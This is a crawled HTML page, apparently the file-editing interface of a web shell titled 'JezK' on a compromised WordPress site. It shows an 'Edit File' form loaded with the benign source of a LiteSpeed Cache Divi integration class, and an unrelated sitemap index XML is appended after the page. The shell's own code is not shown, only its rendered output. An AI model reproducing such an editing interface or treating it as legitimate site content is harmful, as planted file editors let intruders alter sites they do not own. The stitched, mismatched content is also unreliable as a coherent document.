
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: divi-theme-builder.cls.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
// phpcs:ignoreFile
/**
 * The Third Party integration with DIVI Theme.
 *
 * @since       2.9.0
 */
namespace LiteSpeed\Thirdparty;

defined(&#039;WPINC&#039;) || exit();

class Divi_Theme_Builder {

	// private static $js_comment_box = false;

	/**
	 * Check if is Edit mode in frontend, disable all LSCWP features to avoid breaking page builder
	 *
	 * @since 2.9.7.2 #435538 #581740 #977284
	 * @since  2.9.9.1 Added &#039;et_pb_preview&#039; for loading image from library in divi page edit
	 */
	public static function preload() {
		if (!function_exists(&#039;et_setup_theme&#039;)) {
			return;
		}
		if (!empty($_GET[&#039;et_fb&#039;]) || !empty($_GET[&#039;et_pb_preview&#039;]) || (!empty($_GET[&#039;p&#039;]) &amp;&amp; !empty($_GET[&#039;preview&#039;]) &amp;&amp; $_GET[&#039;preview&#039;] === &#039;true&#039;)) {
			do_action(&#039;litespeed_disable_all&#039;, &#039;divi edit mode&#039;);
		}
	}

	public static function detect() {
		if (!defined(&#039;ET_CORE&#039;)) {
			return;
		}

		// As DIVI will set page to non-cacheable for the 1st visit to generate CCSS, will need to ignore that no-cache for crawler
		defined(&#039;LITESPEED_CRAWLER_IGNORE_NONCACHEABLE&#039;) || define(&#039;LITESPEED_CRAWLER_IGNORE_NONCACHEABLE&#039;, true);

		/**
		 * Add contact form to nonce
		 *
		 * @since  2.9.7.1 #475461
		 */
		do_action(&#039;litespeed_nonce&#039;, &#039;et-pb-contact-form-submit&#039;);

		/**
		 * Subscribe module and A/B logging
		 *
		 * @since  3.0 @Robert Staddon
		 */
		do_action(&#039;litespeed_nonce&#039;, &#039;et_frontend_nonce&#039;);
		do_action(&#039;litespeed_nonce&#039;, &#039;et_ab_log_nonce&#039;);

		/*
		// the comment box fix is for user using theme builder, ESI will load the wrong json string
		// As we disabled all for edit mode, this is no more needed
		add_action( &#039;et_fb_before_comments_template&#039;, &#039;Divi_Theme_Builder::js_comment_box_on&#039; );
		add_action( &#039;et_fb_after_comments_template&#039;, &#039;Divi_Theme_Builder::js_comment_box_off&#039; );
		add_filter( &#039;litespeed_esi_params-comment-form&#039;, &#039;Divi_Theme_Builder::esi_comment_add_slash&#039; );// Note: this is changed in v2.9.8.1
		*/
	}

	/*
	public static function js_comment_box_on() {
		self::$js_comment_box = true;
	}

	public static function js_comment_box_off() {
		self::$js_comment_box = false;
	}

	public static function esi_comment_add_slash( $params )
	{
		if ( self::$js_comment_box ) {
			$params[ &#039;is_json&#039; ] = 1;
			$params[ &#039;_ls_silence&#039; ] = 1;
		}

		return $params;
	}
	*/
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
